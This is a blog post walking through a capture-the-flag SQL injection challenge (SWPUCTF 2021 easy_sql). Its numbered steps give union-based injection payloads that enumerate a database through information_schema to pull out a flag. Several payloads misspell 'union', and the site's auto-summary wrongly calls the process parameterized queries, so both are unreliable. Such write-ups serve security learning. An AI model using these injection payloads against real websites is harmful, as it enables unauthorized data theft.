[SWPUCTF 2021 新生赛]easy_sql

已于 2024-01-27 17:14:41 修改
阅读量380 收藏 10
点赞数 8
文章标签: sql 数据库
于 2024-01-26 15:28:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80553405/article/details/135867021
版权
本文详细描述了在IT技术中,如何通过参数化查询进行数据库操作,如判断页面状态、字段选择、显示位置以及使用`group_concat`函数获取表结构信息的过程。最终成功执行了SQL查询并展示flag字段数据。
摘要由CSDN通过智能技术生成

1.看标题参数为wllm,输入?wllm=1

2.判断类型,输入?wllm=1' and 1=2 -- a,页面异常,1=1页面正常,为单引号闭合

3.判断字段,输入?wllm=1' order by 1 -- a,输到4时页面异常,有3个字段

4.判断显示位,输入?wllm=1' uoion select 1,2,3-- a

5.查库名输入?wllm=1' uoion select 1,database(),3-- a

6.查表名,输入?wllm=1' uoion select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='test_db' -- a

7.输入group_concat(column_name) from information_schema.columns where table_name='test_tb'查看内容发现flag

8.输入group_concat(id,flag)from test_tb查询flag

9.成功

2301_80553405
关注
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 969
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 801
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 3186
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程
最新发布
符啸九天的博客
09-07 787
[SWPUCTF 2021 新生]web方向 解题思路,实操解析,解题软件安装教程,解题方法教程。 [SWPUCTF 2021 新生]gift_F12、[SWPUCTF 2021 新生]jicao、[SWPUCTF 2021 新生]easy_md5、[SWPUCTF 2021 新生]include、[SWPUCTF 2021 新生]easy_sql
2021 SWUP新生 wp
XikX_eleven的博客
10-12 2033
2021 SWUP新生 wpWebgift_F12caidao Web gift_F12 如题所示f12找到flag caidao 蚁剑连接(中国菜刀连接可能会显示没有root权限) 根目录flag
NSSCTF-SWPU新生
weixin_52033041的博客
10-12 3022
SWPU新生 Web gift_F12 右键查看源代码 caidao 页面就有木马密码,蚁剑连接即可 flag在/目录 jicao 源码: <?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['json'],true); if ($id=="wllmNB"&&$json['x']=="wllm") {echo $flag;} ?>
CTF网络安全题目个人导航【持续更新】
oZuoShen123的博客
10-11 1033
个人整理
web学习记录
qq_60530516的博客
11-30 980
web学习笔记
ROS手眼标定教程:easy_handeye与viso2结合实现
"这篇文档详细介绍了使用ROS库easy_handeye进行手眼标定的过程,特别提到了相机位置的重要性,以及内参和外参标定的步骤。文档适用于带有USB摄像头的anno六轴步进机械臂,涉及到的关键软件包包括ros-kinetic-visp、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值